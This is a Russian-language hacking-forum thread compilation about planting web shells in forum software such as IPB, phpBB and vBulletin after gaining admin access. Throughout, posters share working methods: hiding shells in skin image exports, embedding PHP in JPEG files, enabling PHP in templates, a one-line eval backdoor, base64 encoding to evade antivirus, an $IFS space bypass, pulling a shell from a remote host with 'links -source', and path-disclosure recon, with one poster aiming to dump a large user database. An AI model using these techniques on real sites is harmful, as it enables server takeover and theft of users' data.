[Заливка шелла в Форуме]
 

Заливка шелла в Форуме

He11.net Forums 1
Ikonboard 1,2
IPB 1,2
Pehota Forum 1
PHPbb 1,2,3,4
SMDS Forum 1
SMF 1
SowiBB 1
vBulletin 1,2
VumFOrum 1
WR 1

© ZAMUT
----------------------------------------------------------------------
Имею полную админку в IPB 1.3, шел через смайлы не катит - ибо там стоят права на запись.. единственная папка с 777 - это uploads, так вот.. моя цель - это залить шелл в эту папку.. действия таковы.
Создаю базу..
Заливаю код
и выдираю его в файл
Загвозка, в том.. что в код вставляются слешы.. из-за них не работает шел.. я уже даж делал c LINE терминатеж бай.. вообщем, не знаю, как избавится от слешей в коде. Ввиду сегодняшнего гуглежа узнал, что они находятся на уровне php.ini. Прошу помощи в составлении запроса.


added@ на запросы внимания не обращайте.. писал машинально.

как залить шелл в phpBB 3.0.3
 

Есть доступ в админку
Не могу залить шелл... пробывал через файлы... рарешил загрузку пхп, заливается но при этом он качается... есть такая функция "Потерянные вложения" не отправлял сообщение... но там ничего нет... получается сейчас на сайте уже есть шеллы нужно только узнать ссылку... была идея узнать через базу... но в ней походу нет управления с БД %)

есть конфиг... но у них phpmyadmin стоит корява.. %)
п.с. сервак на винде

Как залить шелл на vBulletin 3.6.8
 

Как залить шелл на vBulletin 3.6.8?
Есть полные права админа.

Заливка шелла на IPB 2.3.5
 

вообщем такая проблема у меня есть доступ к админке на IPB 2.3.5 я хочу загрузить на сайт шелл я сделал все по примеру с phtml но он открывается как текст
тогда я попробовал операцию с копированием через выполнение пхп кода
copy('T:/home/virtual/forums.xx.ru/uploads/av-4.phtml','T:/home/virtual/forums.xx.ru/uploads/av.php');
но серв 0 реакции на это подскажите в чем может быть проблема
php 5.1.6
topserver низнаю какой версии =)
Apache 2.0 Handler

Попробуй подменить путь заливки авов вместо av на cache Например....и так же лей шелл через phtml///..а пхп код не выполняет наверное потому что у тебя нету прав роот админа...а просто простой админ...

всё равно как текст ( есть еще какиенибудь варианты ?

Если нет прав роот админа то никак ..насколько я знаю..там нИ код выполнить..нИ SQL запросы из админки..

проще через шаблон
заливаешь скин, далее картинки с шеллом в скин, удаляешь скин... картинки с шеллами остаются...
если нужно скину такой скин

cкинь в личку пожалуйста :) а еще лучше обьясни как самому в в хмл с картинками шел добавить :rolleyes:

В общем все просто
находим доступ в админку, заходим
Далее - Внешний Вид
тут:
Если скин IP.Board Pro то делаем так:
1. заходим в настройки этого скина смотрим в какой директории лежат изображения для этого скина. Запоминаем.
2. Импорт и экспорт стилей - Импорт... - Импорт изображений
выбираем ipb_images-ip.boardpr.xml.gz (Какой стиль использовать с импортируемой директорией? IP.Board Pro) - Импортируем
узнаем где лежит шелл, заходим в настройки скина IP.Board Pro
Директория с изображениями - ip.boardpr1228455805 (в моем случае)
Изменяем так как было изночально.

Шелл будет доступен в директории
http://site/style_images/ip.boardpr1228455805/folder_js_skin/js_skin.php

Если нет скина IP.Board Pro
делаем так:
Импорт и экспорт стилей - Импорт... - Импорт шаблонов стиля
1. Импорт шаблонов стиля
выбираем ipb_skin-ip.boardpr.xml.gz (Какую директорию с изображениями использовать в этом стиле? - Никакую)
Залили.. далее
2. Импорт изображений
выбираем ipb_images-ip.boardpr.xml.gz (Какой стиль использовать с импортируемой директорией? - там будет что-то типо IP.Board Pro)
импортировали...
опять таки заходим в настройки скина, смотрим адресс директории
http://site/style_images/ip.boardpr/folder_js_skin/js_skin.php
и не забудьте его удалить, шаблоны удалятся, а картинки нет =)


Объясняю как сделать скин с шеллами
1. Ставим себе форум.
2. Закидываем в папку forum/style_images/нужный вам скин шеллы куда вам нужно.
3. Заходим в админку форума Внешний Вид - Импорт и экспорт стилей - Экспорт...
Какой стиль экспортировать? - выбираем какой нужен
Экспорт изображений
Какие изображения экспортировать? - выбираем папку с шеллами.

http://upload.com.ua/get/900580228 - Этот скин для версии 2.2.х и выше, на 2.1.х не пробывал

зы когда заливаете шелу лучше кодируйти их в base64 дабы они не полились веб антивирусами... :)

phpBB3 шелл?
 

Залез в админку буржуйского форума phpBB3 около миллиона юзеров. Хотел слить базу. Вроде все в порядке но в админке ставлю сжатие gz неканает качает несжатым. И еще трабла качает примерно 70 мегов и обрубает скачку а это примерно 130к ползователей. Причем обрубает с точностью до байта 3 раза пытался. Дамп на сервере не сохраняет видимо прав на папку нет. Есть ли возможность в последней версии phpBB3 залить шелл? Востановление базы я так понял работает только из файлов на сервере. Загрузка аватаров есть.

Сорри незаметил тему перенесите плиз.

2 schut123

Правил картинку вставлял в нее код.
Сделать можно сохранив картинку в фотошопе и открыв hiew найти мето где написанно "Photoshop ....." менял на php код. Если перед этим открыть в паинте и сохранить место сдвинется ближе к начату файла что лучше.
Загружал картинку на сервер через админку способов я помню там полно.
Потом в админке форума создавал новую задачу прописывал путь к картинке и жал выполнить.

Картинка jpg

В конфигурации можно изменить пути к директории на чтото типа ../../../../../tmp чтобы не париться с путями

Код шелла можно и без кавычек делать - например простенький -
<?php eval($_GET[5]); ?>

можно без кавычек как сказали выше можно через функцию char(), можно в HEX-формате

может кто нибудь поподробнее объяснит как залить шелл в phpbb 3.0.3

IPB 1.3 Final. Надо залить шелл. Как?
 

Имеется
Русский Модифицированный IPB v1.3 Final © 2003 BesTFileZ.Net & IBR Team
Аккуант гл.админа. Как залить шелл?

учимся искать: https://forum.antichat.ru/thread76949.html

не заливается через смайлы пробывал уже...и через аватары пробывал.и через бд нельзя так как нет у юзера mysql прав на запись файлов.

Подскажите пожалуйста где раздобыть актуальный шел? Искал шел от rst, но на все что я находил - ругается антивирь. :(

шел от madnet
http://madnet.name/files/1/10.html

Шелы не могут быть не актуальными. r57 юзай, ибо cyber shell

Это моё мнение

как залить шел на сервер если там стоит TB Dev SZ Edition ...... есть пасс от админки........

кто-нибудь заливал шел в 3.0.х ?
восстановление базы только из файлов на сервере (%

Имею доступ к админке phpBB 2.0.23 (обычный двиг без всяких модов), как можно залить шел, связь если чё 302-809 ;) выручайте друзья!

Народ у меня такая ПРОБЛЕМА с r57shell, я так понимаю мне нужен компилятор, пробовал устанавливать Денвер но не помогло, кто что посаветует?

cкорее не компилятор, а интерпретатор
денвер должен был помочь, т.к. в него php включен
ну попробуй поставить xampp или wampserver

RazyKK Замени пробел . Всё индивидуально, но попробуй например так:
ls$IFS-la

RazyKK попробуй по одному ввести, тоесть сначала which lynx потом which wget и т.д.

Заливка links
links -source "http://откуда/shell.php" > /папка/куда/shell.php

Есть доступ в админку phpBB3 .

существует ли способ залить шелл???
если да, то какой?

1) Вкладка общие --> Безопасность
Разрешить php в шаблонах: Да
2)Вкладка Стили --> Компоненты стилей ->> Шаблоны
С помощью встроенного редактора шаблонов выбираем файл и пишем в него:
Код:

<!-- PHP --> phpinfo(); <!-- ENDPHP -->


Далее применяем шаблон, идем на измененную страницу и видим наш php код

Этот способ описал DeepXhadow за что ему +

имея информацию настроек и тд, что можно с ней делать?

Пытаюсь залить шелл на phpbb 2.0.21. Делаю апдейт бд через админку такого рода:
phpinfo() выводит без проблем, а так же любую команду через eval или passthru, но только состоящую из одного слова, так как не принимает кавычки. Тоесть, passthru(ls) работает, а passthru(ls -la) уже естествено нет. Пробовал обойти эту херню всякими бэк-слэшами, не помогает...

Может кто знает как это можно обойти? Может через char() или hex как это делается в мускл?

// Все нашол!

Как в XMB из админки залить?

Подскажите, залил шелл в phpBB 2й версии, вообщем лазаю там, хотел отредить индекс, а оказалось что там стоит тип на всех файлах только для чтения видать, ибо нечего не могу отредить :/, вопрос, можно ли это как нить убрать? шелл с57

установить права доступа

как именно? ) если можно то по конкретнее )

работает отлично, спасибо =) ipb 2.3.4

Подскажите как залить шелл в пхп2 ? доступ в админку есть, проблема в том что не моуг узнать полный путь к папке форума поэтому 1й пост не какит, узнать не могу ибо почему то профили вообще не работают -_-

узнать путь не особая проблема:
1. поюзай гугл inurl:site.com "error"
2. просканируй сайт на дириктории (часто бывают случаи что открыты дирриктории в которых лежат php скрипты, которые при примом открытии выдают ошибку синтаксическу ну и раскрытие)
3. потыкай скрипты что кроме форумного движка стоят (если есть)
4. реверс айпи, тыкаешь другие сайты на поиск раскрытия путей (часто случается что путь выглядет /usr/home/domain.com/htdocs/; /usr/home/domain2.com/htdocs/)
включи мозги